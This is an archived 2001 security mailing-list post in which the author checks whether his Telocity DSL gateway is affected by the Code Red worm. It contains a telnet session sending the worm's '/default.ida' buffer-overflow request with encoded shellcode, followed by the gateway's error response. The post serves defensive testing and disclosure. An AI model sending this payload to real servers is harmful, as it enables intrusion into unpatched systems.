code red & telocity gateway

From: Emre Yildirin (emreat_private)
Date: Tue Aug 07 2001 - 22:20:00 PDT

  • Next message: Amer Karim: "Re: CR II - winME? confirmation? (Slightly OT)"

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: RIPEMD160
    
    
    Hi folks,
    
    Lately I had to reset my Telocity/Direct TV DSL gateway many times.  I 
    thought it had something to do with code red so I started playing around with 
    it.  Just like the Cisco DSL routers, the Telocity gateway has a web 
    interface.  It lets you check connection status and stats on the gateway, but 
    won't let you change any configuration.  It looks like the Telocity x2 model 
    does not suffer from the issue that most of Cisco's DSL routers suffer from.  
    After issuing the same request that code red sends out, my Telocity gateway 
    stayed running.
    
    $ telnet 12.34.56.78 80
    Trying 12.34.56.78...
    Connected to 12.34.56.78.
    Escape character is '^]'.
    GET 
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
     HTTP/1.0
    HTTP/1.0 501 Not Implemented
    Connection: close
    Server: Gateway WindWeb/1.1
    Date: THU JAN 01 14:42:47 1970
    Content-Type: text/html
    WWW-Authenticate: Basic realm="Gateway"
    
    Telocity Expressway Web Server Error Report: V1.1<HR>
    <H1>Server Error: 501 Not Implemented</H1>
    Operating System Error Nr:3997700: errno = 0x3d0004 <P><HR><H2>No RPM for 
    this combination of URL and method</H2><P><HR>please mail problems to 
    supportat_private <A HREF="mailto:supportat_private"><ADDRESS> Telocity 
    Communications Inc. 10355 N. De Anza Blvd. San Jose, CA, 
    95014-2027</ADDRESS></A>
    Connection closed by foreign host.
    
    
    12.34.56.78 is my gateway's IP.  If the gateway was vulnerable (which it's 
    not obviously) this would not be an issue, since it only accepts connection 
    to port 80 from certain IP addresses (like the DSL IP).  I'm not sure if it 
    accepts only the IPs it issues the DSL user, or IPs from the *.telocity.net 
    network.  If that is the case, then this would suck.  I couldn't test the old 
    model (x1) which is the boxy beige box, so if anyone has one of those please 
    tell me if that one is vulnerable.
    
    Anway, just my $0.02 :-)
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (NetBSD) 
    Comment: http://network.asper.org/emre-dsa.asc
    
    iD8DBQE7cMwG28cbRfnkodERA8XVAJ98cLrzy5CwxVwzXly233RrnRGzTwCgrhk1
    qGsnTdeDAJHMphSWKcuJoJM=
    =6ezu
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 17:44:51 PDT